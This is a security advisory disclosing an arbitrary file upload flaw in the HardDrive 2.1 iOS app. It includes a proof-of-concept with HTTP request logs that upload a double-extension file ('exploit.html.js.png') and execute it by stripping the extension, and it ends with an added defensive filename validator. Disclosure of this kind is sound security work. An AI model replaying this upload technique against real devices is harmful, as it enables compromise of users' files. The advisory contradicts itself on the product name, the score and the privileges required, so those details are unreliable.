# Title: HardDrive 2.1 for iOS - Arbitrary File Upload
# Author: Vulnerability Laboratory
# Date: 2020-04-30
# Software: https://apps.apple.com/ch/app/harddrive/id383226784
# CVE: N/A

Document Title:
===============
HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2221

Common Vulnerability Scoring System:
====================================
7.4

Product & Service Introduction:
===============================
Store+Organize+Edit+Protect+Import+Download+View+Share your files right from your iPhone!
Transform your iPhone/iPod touch into a real HardDrive with no extra cable or software.

(Copy of the Homepage: https://apps.apple.com/ch/app/harddrive/id383226784 )

Affected Product(s):
====================
Sebastien BUET
HardDrive v2.1 - Apple iOS Mobile Web Application

Vulnerability Disclosure Timeline:
==================================
2020-04-29: Public Disclosure (Vulnerability Laboratory)

Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official Air Sender v1.0.2 iOS mobile application.
The web vulnerability allows remote attackers to upload arbitrary files to compromise, for example, the file system of a service.

The arbitrary upload vulnerability is located within the web-server configuration when using the upload module.
Remote attackers are able to bypass the local web-server configuration by an upload of malicious webshells.
Attackers are able to inject their own files with malicious `filen` values in the `upload` POST method request to compromise the mobile web-application.
The application does not perform checks for multiple file extensions. This allows an attacker to upload, for example, a html.js.png file.
After the upload the attacker requests the original url source with the uploaded file and removes the unwanted extension to execute the code in the unprotected web-frontend.

The security risk of the vulnerability is estimated as high with a common vulnerability scoring system count of 7.0.
Exploitation of the web vulnerability requires a low privilege ftp application user account and no user interaction.
Successful exploitation of the arbitrary file upload web vulnerability results in application or device compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] ./upload

Vulnerable File(s):
[+] file

Proof of Concept (PoC):
=======================
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged user accounts.
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.

PoC: Vulnerable Source (File Dir Listing Index)
<tr><td width="100px" valign="middle" align="left"><img src="exploit.html"></td><td width="300px" valign="middle" align="left">
<a href="exploit.html.js">exploit.html.js</a></td>
<td width="454px" valign="middle" align="left">
<em valign="middle" align="center">size: 256.7 Kb

PoC: Exploitation
http://localhost:50071/exploit.html.js

--- PoC Session Logs [POST] --- (file)
http://localhost:50071/
Host: localhost:50071
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------9331569428946906291010349387
Content-Length: 263181
Origin: http://localhost:50071
Connection: keep-alive
Referer: http://localhost:50071/
file=exploit.html.js.png&button=Submit
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 381654
-
http://localhost:50071/exploit.html.js
Host: localhost:50071
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
-
http://localhost:50071/exploit.html
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 366735

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

--
VULNERABILITY LABORATORY - RESEARCH TEAM
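
Added example (not part of the advisory and not the vendor's code): a server-side filename check addressing the missing multiple-extension validation described under Technical Details. The allowlist, the `RejectedUpload` exception and the function names are assumptions chosen for illustration.

```python
import os
import re
import uuid

# Assumption: the service only needs to store these passive file types.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}
SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


class RejectedUpload(ValueError):
    """Raised when a client-supplied filename fails validation."""


def validate_upload_name(client_name: str) -> str:
    """Return the lower-cased extension if the name is acceptable, else raise."""
    # Drop any directory part the client sent (both separator styles).
    base = os.path.basename(client_name.replace("\\", "/"))
    if not base or base.startswith(".") or "\x00" in base:
        raise RejectedUpload("empty, hidden or NUL-containing name")
    parts = base.split(".")
    if len(parts) != 2:
        # Exactly one dot: "a.png" passes, "a.html.js.png" and "a" do not.
        raise RejectedUpload("name must have exactly one extension")
    stem, ext = parts[0], parts[1].lower()
    if not SAFE_STEM.fullmatch(stem):
        raise RejectedUpload("unexpected characters in name")
    if ext not in ALLOWED_EXTENSIONS:
        raise RejectedUpload("extension not allowed: " + ext)
    return ext


def stored_name(client_name: str) -> str:
    """Server-chosen storage name; the client string never reaches the disk."""
    ext = validate_upload_name(client_name)
    return uuid.uuid4().hex + "." + ext


if __name__ == "__main__":
    # Constructed sample names; the first is the one from the advisory's PoC.
    for name in ["exploit.html.js.png", "exploit.html.js", "holiday.PNG"]:
        try:
            print(name, "->", stored_name(name))
        except RejectedUpload as err:
            print(name, "-> rejected:", err)
```

Because the file is stored under a server-generated name, a request for that name with a suffix removed matches no stored file.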